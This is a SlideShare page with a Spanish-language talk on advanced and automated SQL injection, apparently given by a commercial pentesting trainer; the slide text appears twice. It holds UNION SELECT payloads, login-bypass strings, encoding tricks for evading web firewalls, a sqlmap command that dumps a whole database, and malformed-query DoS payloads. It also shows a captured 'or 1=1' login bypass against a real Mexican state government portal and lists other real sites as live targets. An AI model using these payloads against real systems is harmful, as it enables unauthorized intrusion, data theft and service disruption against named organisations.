SlideShare une entreprise Scribd logo
1  sur  27
Inyecciones SQL Avanzadas y
              automatizadas.
               www.n3xasec.com




Pentester Rafael Gómez Del Ángel
Director de N3XAsec
Docente de la certificación:
SIOHE Seguridad Informática Ofensiva Hacking Etico
TEMAS QUE VEREMOS EN LA PONENCIA

1.- Identificación de la vulnerabilidad

2.-Estructuración básica de una inyección

3.-Blindando las inyecciones

4.-Automatizando las inyecciones

5.-Evadiendo Firewall Web

6.-Loggin Bypass

7.-Dumpeando la base de datos

8.-Vulnerando servidores de GOBIERNO

9.-Ataques DOS SQLI
¿Que es una inyección SQL ?


           Inyectar
                                                         Inyectar
           AQUI !!
                                                         AQUI !!



                  www.victima.com/index.php?idVulnerable=34

                              GET




POST
Mas vulnerabilidades de inyección !!



XSS
                   RFI


      LDAP          Command Injection


             LFI
Estructura básica de una inyección

  Una inyección esta compuesta básicamente 3 partes:

  1.-La sintaxis en lenguaje SQL, union+all+select,

  2.-Busqueda de numero de tablas 1,2,3,4,5,6,7....
  (NULL,NULL,NULL)

  3.- El comando a ejecutar o los datos a obtener @@version

           id_vulnerable=73+UNION+ALL+SELECT 1,2,3 */*
           id_vulnerable=73+UNION+ALL+SELECT 1,2,@@version*/*

id_vulnerable=73' LIMIT 1,1 UNION ALL SELECT NULL, NULL,
CONCAT(0x3a626e653a,0x4f536a56435074746677,0x3a626c713a), NULL, NULL,
NULL, NULL#
Video de inyección e identificación Básica !!
Blindando las inyecciones SQL !

  Urlencode

                                        Base 64 encode
                                        L2V0Yy9wYXNzd2Qv==
                                             /etc/passwd/



                                           Hexencode

                              2f2a2a2f6574632f7061737377642f2a2a2f

                                         /**/**/etc/passwd/**/**/
                                     /**/**/etc/**/**/passwd/**/**/




  http://www.string-functions.com/
Host=portal2.edomex.gob.mx
User-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=es-MX,es-ES;q=0.8,es-AR;q=0.7,es;q=0.5,en-
US;q=0.3,en;q=0.2
Accept-Encoding=gzip, deflate
Referer=http://portal2.edomex.gob.mx/idcprod/idcplg?
IdcService=LOGIN&Action=GetTemplatePage&Page=HOME_PAGE&Auth=Int
ernet
Cookie=__utma=26329020.1898314859.1361471024.1361478811.1362458074.3
; __utmz=26329020.1361478811.2.2.utmcsr=busquedas.edomex.gob.mx|
utmccn=(referral)|utmcmd=referral|utmcct=/search/query/browse.jsp;
HstCfa704590=1362458074082; HstCla704590=1362458074082;
HstCmu704590=1362458074082; HstPn704590=1; HstPt704590=1;
HstCnv704590=1; HstCns704590=1;
BIGipServerpool_ContentManager_80=3355970058.20480.0000;
BIGipServerpool_PortalWebcacheNuevo_7777=1762265610.24862.0000
Content-Length=199
POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=
%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg
%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page
%3DHOME_PAGE%26Auth%3DInternet&edit=Login
POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=
%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg
%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page
%3DHOME_PAGE%26Auth%3DInternet&edit=Login
LOGGIN BY PASS!!


Para pasarnos un loggin Se utiliza la sentencia OR ya
que esta significa que si algo es verdadero entonces
todo será verdadero OR 1=1 . Esto provocará que
automáticamente toda la consulta sea verdadera, sea
cual sea el usuario.

1.- V or V = VERDADERO-------------------- ‘’OR 1=1 /* ‘
2.- V or F = VERDADERO-------------------- “OR 1=0 /* ‘
3.- F or V = VERDADERO-------------------- “OR 0=1 /* ‘
4.- F or F = FALSO----------------------------- “OR 0=0 /* ’
LOGGIN BY PASS!!

                     admin’ - -
                     admin’ #
                     admin ‘ /*
                     ‘ or 1=1- -
                     ‘ or 1=1#
                     ‘ or 1=0/*
                     ‘) or 1=0
                   ‘1’=‘1- -
                     ‘) or 1=1
                   (‘1’=‘1 - -
                     ‘) */ 1=0 #
Penetrar un servidor en VIVO



http://salud.edomexico.gob.mx/html/index.php
http://ddsisem.dyndns.org/activo_fijo/login.php
WAF
WAF   Web Application Firewall
      Web Application Firewall
Como funciona el WAF ?
Detectando WAF
Detectando WAF
Char Encode
             Útil para evadir detección de palabras

El atacante sabe que existen filtros que evitara la llegada de la
inyección al servidor, el usara una combinación de caracteres y
encriptaciones para saltarse los filtros y el IDS lo reconozca como
validos.
Char-doble encode
Cifra en Hexadecimal, útil cuando la aplicación emplea Url encode
Char-Unicode Encode
    Cifrando con el estándar
            Unicode
Automatización de inyección
    Automatización de inyección

HAVIJ
                       SQLMAP
Video automatización de inyección y Tampers
Video automatización de inyección y Tampers
Dumpleando la BD
          Dumpleando la BD



./sqlmap.py -u www.xxx.sp.php?id=666 --dump -all
                  VIDEO
Ataques DOS por inyección SQL


    Este ataque se genera cuando mandamos una consulta
    MAL formada, de tal manera que cuando el servidor la
    interprete cause un conflicto interno o “Se confunda”


   Id?=66+Union,concat(0x3,slep(10000000),0x3) */#--

    ')OR'#1='2--

    #Select+from,--

    '(#')-- OR +FROM--
Penetración a sistemas de gobierno

    Es el sector mas atacado por hacktivistas
GRACIAS!!! ¿ Dudas ?



INSCRIPCIONES
ABIERTAS                 Diplomado para SIOHE Seguridad Informática
                         Ofensiva Hacking Etico
INICIO 15 DE MAYO
2013

Plan de financiamiento




 Informes :
 info@n3xasec.com



   Descarga de material y diapositivas

    www.n3xasec.com

Contenu connexe

Tendances

Bypassing waf advanced
Bypassing waf advancedBypassing waf advanced
Bypassing waf advancedlimahack
 
Escarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixEscarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixPaloSanto Solutions
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Seguridad en VoIP Open Source: Poniendo el punto sobre la i
Seguridad en VoIP Open Source: Poniendo el punto sobre la iSeguridad en VoIP Open Source: Poniendo el punto sobre la i
Seguridad en VoIP Open Source: Poniendo el punto sobre la iPaloSanto Solutions
 
Instalacion de avira antivirus y mas utilerias
Instalacion de avira antivirus y mas utilerias Instalacion de avira antivirus y mas utilerias
Instalacion de avira antivirus y mas utilerias aldo232
 
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXElastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXPaloSanto Solutions
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 

Tendances (8)

Bypassing waf advanced
Bypassing waf advancedBypassing waf advanced
Bypassing waf advanced
 
Escarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixEscarbando en el módulo Security de Elastix
Escarbando en el módulo Security de Elastix
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Seguridad en VoIP Open Source: Poniendo el punto sobre la i
Seguridad en VoIP Open Source: Poniendo el punto sobre la iSeguridad en VoIP Open Source: Poniendo el punto sobre la i
Seguridad en VoIP Open Source: Poniendo el punto sobre la i
 
Instalacion de avira antivirus y mas utilerias
Instalacion de avira antivirus y mas utilerias Instalacion de avira antivirus y mas utilerias
Instalacion de avira antivirus y mas utilerias
 
Seguridad so pii_2011
Seguridad so pii_2011Seguridad so pii_2011
Seguridad so pii_2011
 
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXElastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 

Similaire à Ponencia sql avanzado y automatizado

Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerraFutura Networks
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTJose Gonzales
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeatCISObeat
 
Seguridad web para desarrolladores - OWASP
Seguridad web para desarrolladores - OWASPSeguridad web para desarrolladores - OWASP
Seguridad web para desarrolladores - OWASPMarcos Harasimowicz
 
In seguridad de aplicaciones web
In seguridad de aplicaciones webIn seguridad de aplicaciones web
In seguridad de aplicaciones webSaul Mamani
 
Taller cybersecurity 2016
Taller cybersecurity 2016Taller cybersecurity 2016
Taller cybersecurity 2016Gonzalo Vigo
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades webPablo Garaizar
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupalzekivazquez
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebEduardo Jalon
 
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLMorely Garcia Leon
 
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLMorely Garcia Leon
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De DatosWilliam Suárez
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datosguestb40a1b0
 

Similaire à Ponencia sql avanzado y automatizado (20)

Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerra
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
 
Seguridad web para desarrolladores - OWASP
Seguridad web para desarrolladores - OWASPSeguridad web para desarrolladores - OWASP
Seguridad web para desarrolladores - OWASP
 
In seguridad de aplicaciones web
In seguridad de aplicaciones webIn seguridad de aplicaciones web
In seguridad de aplicaciones web
 
Taller cybersecurity 2016
Taller cybersecurity 2016Taller cybersecurity 2016
Taller cybersecurity 2016
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en php
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades web
 
Hacking & Hardening Drupal
Hacking & Hardening DrupalHacking & Hardening Drupal
Hacking & Hardening Drupal
 
Cómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación WebCómo realizar un test de intrusión a una aplicación Web
Cómo realizar un test de intrusión a una aplicación Web
 
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
 
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQLATAQUE POR INYECCIÓN DE CÓDIGO SQL
ATAQUE POR INYECCIÓN DE CÓDIGO SQL
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datos
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datos
 

Ponencia sql avanzado y automatizado

  • 1. Inyecciones SQL Avanzadas y automatizadas. www.n3xasec.com Pentester Rafael Gómez Del Ángel Director de N3XAsec Docente de la certificación: SIOHE Seguridad Informática Ofensiva Hacking Etico
  • 2. TEMAS QUE VEREMOS EN LA PONENCIA 1.- Identificación de la vulnerabilidad 2.-Estructuración básica de una inyección 3.-Blindando las inyecciones 4.-Automatizando las inyecciones 5.-Evadiendo Firewall Web 6.-Loggin Bypass 7.-Dumpeando la base de datos 8.-Vulnerando servidores de GOBIERNO 9.-Ataques DOS SQLI
  • 3. ¿Que es una inyección SQL ? Inyectar Inyectar AQUI !! AQUI !! www.victima.com/index.php?idVulnerable=34 GET POST
  • 4. Mas vulnerabilidades de inyección !! XSS RFI LDAP Command Injection LFI
  • 5. Estructura básica de una inyección Una inyección esta compuesta básicamente 3 partes: 1.-La sintaxis en lenguaje SQL, union+all+select, 2.-Busqueda de numero de tablas 1,2,3,4,5,6,7.... (NULL,NULL,NULL) 3.- El comando a ejecutar o los datos a obtener @@version id_vulnerable=73+UNION+ALL+SELECT 1,2,3 */* id_vulnerable=73+UNION+ALL+SELECT 1,2,@@version*/* id_vulnerable=73' LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a626e653a,0x4f536a56435074746677,0x3a626c713a), NULL, NULL, NULL, NULL#
  • 6. Video de inyección e identificación Básica !!
  • 7. Blindando las inyecciones SQL ! Urlencode Base 64 encode L2V0Yy9wYXNzd2Qv== /etc/passwd/ Hexencode 2f2a2a2f6574632f7061737377642f2a2a2f /**/**/etc/passwd/**/**/ /**/**/etc/**/**/passwd/**/**/ http://www.string-functions.com/
  • 8. Host=portal2.edomex.gob.mx User-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=es-MX,es-ES;q=0.8,es-AR;q=0.7,es;q=0.5,en- US;q=0.3,en;q=0.2 Accept-Encoding=gzip, deflate Referer=http://portal2.edomex.gob.mx/idcprod/idcplg? IdcService=LOGIN&Action=GetTemplatePage&Page=HOME_PAGE&Auth=Int ernet Cookie=__utma=26329020.1898314859.1361471024.1361478811.1362458074.3 ; __utmz=26329020.1361478811.2.2.utmcsr=busquedas.edomex.gob.mx| utmccn=(referral)|utmcmd=referral|utmcct=/search/query/browse.jsp; HstCfa704590=1362458074082; HstCla704590=1362458074082; HstCmu704590=1362458074082; HstPn704590=1; HstPt704590=1; HstCnv704590=1; HstCns704590=1; BIGipServerpool_ContentManager_80=3355970058.20480.0000; BIGipServerpool_PortalWebcacheNuevo_7777=1762265610.24862.0000 Content-Length=199 POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password= %27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg %3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page %3DHOME_PAGE%26Auth%3DInternet&edit=Login
  • 10. LOGGIN BY PASS!! Para pasarnos un loggin Se utiliza la sentencia OR ya que esta significa que si algo es verdadero entonces todo será verdadero OR 1=1 . Esto provocará que automáticamente toda la consulta sea verdadera, sea cual sea el usuario. 1.- V or V = VERDADERO-------------------- ‘’OR 1=1 /* ‘ 2.- V or F = VERDADERO-------------------- “OR 1=0 /* ‘ 3.- F or V = VERDADERO-------------------- “OR 0=1 /* ‘ 4.- F or F = FALSO----------------------------- “OR 0=0 /* ’
  • 11. LOGGIN BY PASS!! admin’ - - admin’ # admin ‘ /* ‘ or 1=1- - ‘ or 1=1# ‘ or 1=0/* ‘) or 1=0 ‘1’=‘1- - ‘) or 1=1 (‘1’=‘1 - - ‘) */ 1=0 #
  • 12.
  • 13. Penetrar un servidor en VIVO http://salud.edomexico.gob.mx/html/index.php http://ddsisem.dyndns.org/activo_fijo/login.php
  • 14. WAF WAF Web Application Firewall Web Application Firewall
  • 17. Char Encode Útil para evadir detección de palabras El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  • 18. Char-doble encode Cifra en Hexadecimal, útil cuando la aplicación emplea Url encode
  • 19. Char-Unicode Encode Cifrando con el estándar Unicode
  • 20. Automatización de inyección Automatización de inyección HAVIJ SQLMAP
  • 21. Video automatización de inyección y Tampers Video automatización de inyección y Tampers
  • 22. Dumpleando la BD Dumpleando la BD ./sqlmap.py -u www.xxx.sp.php?id=666 --dump -all VIDEO
  • 23. Ataques DOS por inyección SQL Este ataque se genera cuando mandamos una consulta MAL formada, de tal manera que cuando el servidor la interprete cause un conflicto interno o “Se confunda” Id?=66+Union,concat(0x3,slep(10000000),0x3) */#-- ')OR'#1='2-- #Select+from,-- '(#')-- OR +FROM--
  • 24. Penetración a sistemas de gobierno Es el sector mas atacado por hacktivistas
  • 25.
  • 26.
  • 27. GRACIAS!!! ¿ Dudas ? INSCRIPCIONES ABIERTAS Diplomado para SIOHE Seguridad Informática Ofensiva Hacking Etico INICIO 15 DE MAYO 2013 Plan de financiamiento Informes : info@n3xasec.com Descarga de material y diapositivas www.n3xasec.com